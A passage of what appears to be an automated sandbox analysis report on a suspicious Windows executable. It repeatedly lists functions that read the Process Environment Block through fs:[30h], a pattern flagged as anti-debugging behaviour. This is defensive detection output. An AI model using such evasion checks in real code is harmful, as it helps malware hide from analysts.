        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94B94 mov edi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5138A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A91BE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABDBE9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC03E2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B423E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC53C5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B153CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B153CA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA309 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5131B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9DB60 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B7A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAF370 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAF370 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAF370 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9DB40 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68B58 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9F358 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3B5A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B69CB3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94CB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54496 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A91480 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA849B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9649B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9649B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16CF0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B514FB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68CD6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92CDB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACBC2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94439 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3C3E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3C3E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC3C3E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB433 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB433 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAB433 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68C14 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51C06 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B6740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B6740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B6740D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16C0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68C75 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB746D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACAC7B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB477 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5C70 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B2C450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68450 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACA44B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC65A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC65A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC65A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC35A1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC1DB5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B605AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B605AC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A92D8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5B581 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACFD9B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52D82 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93591 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC95EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B48DF1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAD5E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5FDE2 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A995F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A995F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4FDD3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A915C1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16DC9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B16DC9 mov ecx, dword ptr fs:[00000030h]
